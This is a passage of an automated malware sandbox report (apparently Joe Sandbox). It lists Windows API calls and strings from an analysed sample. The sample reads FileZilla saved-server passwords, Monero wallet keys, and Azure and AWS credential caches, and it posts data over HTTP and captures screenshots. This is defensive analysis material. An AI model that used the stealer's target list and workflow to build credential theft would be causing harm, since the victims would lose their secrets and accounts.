                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00340DBA,00340DB7,00340DB6,00340DB3), ref: 00330362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00330369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00330385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 003303CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 003303DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00330419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00330463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 00330532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00330562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00330571
                              • lstrcat.KERNEL32(?,url: ), ref: 00330580
                              • lstrcat.KERNEL32(?,00000000), ref: 00330593
                              • lstrcat.KERNEL32(?,00341678), ref: 003305A2
                              • lstrcat.KERNEL32(?,00000000), ref: 003305B5
                              • lstrcat.KERNEL32(?,0034167C), ref: 003305C4
                              • lstrcat.KERNEL32(?,login: ), ref: 003305D3
                              • lstrcat.KERNEL32(?,00000000), ref: 003305E6
                              • lstrcat.KERNEL32(?,00341688), ref: 003305F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00330604
                              • lstrcat.KERNEL32(?,00000000), ref: 00330617
                              • lstrcat.KERNEL32(?,00341698), ref: 00330626
                              • lstrcat.KERNEL32(?,0034169C), ref: 00330635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00340DB2), ref: 0033068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 360c86ccbca85c723872c55c219f2ebe210b714564c7366b18ae038a97af2097
                              • Instruction ID: 3b07243eb347d9c82f53ad1cbda0dbfbdbb47befc8fcfd77d39937ebd658dcb3
                              • Opcode Fuzzy Hash: 360c86ccbca85c723872c55c219f2ebe210b714564c7366b18ae038a97af2097
                              • Instruction Fuzzy Hash: 02D11B72910608ABCB06EBE4DDD6EEE7778EF14300F544418F542BF091DE74AA4ADB62
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00324839
                                • Part of subcall function 003247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00324849
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003259F8
                              • StrCmpCA.SHLWAPI(?,0109E7E8), ref: 00325A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00325B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0109E778,00000000,?,0109A420,00000000,?,00341A1C), ref: 00325E71
                              • lstrlen.KERNEL32(00000000), ref: 00325E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00325E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00325E9A
                              • lstrlen.KERNEL32(00000000), ref: 00325EAF
                              • lstrlen.KERNEL32(00000000), ref: 00325ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00325EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00325F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00325F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00325F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00325FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00325FBD
                              • HttpOpenRequestA.WININET(00000000,0109E828,?,0109E398,00000000,00000000,00400100,00000000), ref: 00325BF8
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • InternetCloseHandle.WININET(00000000), ref: 00325FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 9c6050edf70c253a57d3fee9de67f052143d73b0963aadfe779a877bb2397bb0
                              • Instruction ID: e30a39168fe6c3d76b5d661cb65f89e2f727c548ea4219a0d91f760bbabb9276
                              • Opcode Fuzzy Hash: 9c6050edf70c253a57d3fee9de67f052143d73b0963aadfe779a877bb2397bb0
                              • Instruction Fuzzy Hash: E9120C72820518AADB16EBA0DCD5FEEB778BF14700F5041A9F1467B091EF702A4ADF61
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0032D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0032D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D208
                              • lstrcat.KERNEL32(?,00341478), ref: 0032D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D22A
                              • lstrcat.KERNEL32(?,0034147C), ref: 0032D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D24C
                              • lstrcat.KERNEL32(?,00341480), ref: 0032D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D26E
                              • lstrcat.KERNEL32(?,00341484), ref: 0032D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D290
                              • lstrcat.KERNEL32(?,00341488), ref: 0032D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D2B2
                              • lstrcat.KERNEL32(?,0034148C), ref: 0032D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0032D2D4
                              • lstrcat.KERNEL32(?,00341490), ref: 0032D2E3
                                • Part of subcall function 0033A820: lstrlen.KERNEL32(00324F05,?,?,00324F05,00340DDE), ref: 0033A82B
                                • Part of subcall function 0033A820: lstrcpy.KERNEL32(00340DDE,00000000), ref: 0033A885
                              • lstrlen.KERNEL32(?), ref: 0032D32A
                              • lstrlen.KERNEL32(?), ref: 0032D339
                                • Part of subcall function 0033AA70: StrCmpCA.SHLWAPI(01099228,0032A7A7,?,0032A7A7,01099228), ref: 0033AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0032D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: d31e61781da046cc1f86e62b3ce7f11532cffab766fa67a15f2b071950bdb555
                              • Instruction ID: 9dd33eb798000444158c886ce14af9397db82bceb021a1fdbe5eba515f27a5e0
                              • Opcode Fuzzy Hash: d31e61781da046cc1f86e62b3ce7f11532cffab766fa67a15f2b071950bdb555
                              • Instruction Fuzzy Hash: C1E14B72910508ABCB06EBA4DDD6EEE7778BF24300F104158F146BB191DF75AA09EF62
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0109D308,00000000,?,0034144C,00000000,?,?), ref: 0032CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0032CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0032CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0032CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0032CAD9
                              • StrStrA.SHLWAPI(?,0109D380,00340B52), ref: 0032CAF7
                              • StrStrA.SHLWAPI(00000000,0109D170), ref: 0032CB1E
                              • StrStrA.SHLWAPI(?,0109DAE0,00000000,?,00341458,00000000,?,00000000,00000000,?,010991A8,00000000,?,00341454,00000000,?), ref: 0032CCA2
                              • StrStrA.SHLWAPI(00000000,0109DB40), ref: 0032CCB9
                                • Part of subcall function 0032C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0032C871
                                • Part of subcall function 0032C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0032C87C
                              • StrStrA.SHLWAPI(?,0109DB40,00000000,?,0034145C,00000000,?,00000000,01099218), ref: 0032CD5A
                              • StrStrA.SHLWAPI(00000000,010990B8), ref: 0032CD71
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B46), ref: 0032C943
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B47), ref: 0032C957
                                • Part of subcall function 0032C820: lstrcat.KERNEL32(?,00340B4E), ref: 0032C978
                              • lstrlen.KERNEL32(00000000), ref: 0032CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0032CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: cbefe68724c0deb735fea555715eeda86e53889119ee05b42e90eef65ab1aeb1
                              • Instruction ID: 040b29e615b0304735ad9f08957b4a649bbb418e199d05949225cf702690cc6e
                              • Opcode Fuzzy Hash: cbefe68724c0deb735fea555715eeda86e53889119ee05b42e90eef65ab1aeb1
                              • Instruction Fuzzy Hash: B9E11C71910508ABDB16EBA4DCD2FEEBB78AF14300F004159F146BB191EF746A4ADF62
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0109B308,00000000,00020019,00000000,003405B6), ref: 003383A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00338426
                              • wsprintfA.USER32 ref: 00338459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0033847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0033848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00338499
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 4bbf54a077948764791089933173081452f0726b9c6d2b2870e8f41dab61d0a1
                              • Instruction ID: 57dfdb43f9d0db14e0d8dc3b140772a6782a280cbd13bc788569458f7175f090
                              • Instruction Fuzzy Hash: 5A811B71910218ABDB25DB54CC95FEAB7B8FF58700F008298F149AB140DF75AB89CF91
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00334DCD
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 0033492C
                                • Part of subcall function 00334910: FindFirstFileA.KERNEL32(?,?), ref: 00334943
                              • lstrcat.KERNEL32(?,00000000), ref: 00334E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00334E59
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                                • Part of subcall function 00334910: FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                                • Part of subcall function 00334910: FindClose.KERNEL32(000000FF), ref: 00334B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00334EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00334EE5
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 003349B0
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,003408D2), ref: 003349C5
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 003349E2
                                • Part of subcall function 00334910: PathMatchSpecA.SHLWAPI(?,?), ref: 00334A1E
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,0109E908), ref: 00334A4A
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,00340FF8), ref: 00334A5C
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,?), ref: 00334A70
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,00340FFC), ref: 00334A82
                                • Part of subcall function 00334910: lstrcat.KERNEL32(?,?), ref: 00334A96
                                • Part of subcall function 00334910: CopyFileA.KERNEL32(?,?,00000001), ref: 00334AAC
                                • Part of subcall function 00334910: DeleteFileA.KERNEL32(?), ref: 00334B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: e660003d639b4287d4a9acf7e69c52e219eb555fe9f9474e1593f1314ec17c44
                              • Instruction ID: 5e17a0225000a07867edf77c227365c698774033250889faf196add421449ae0
                              • Instruction Fuzzy Hash: 2441947AA4031867D715F770EC87FED7778AB24700F004494B2856A0C1EEF5ABC99B92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0033906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: d0cf68953510535266359f55bcec6ea7ce239bad75882d2711dfb4a47a8e8bdf
                              • Instruction ID: e45f8c846cf33d817dd678824dc188f2db0c434330dbe98531ab6813f1796ff0
                              • Instruction Fuzzy Hash: 1A71CAB5910208EBDB04EBE8DD89FEEB7B9BF58700F108508F515AB290DB74A905DF61
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 003331C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0033335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 003334EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
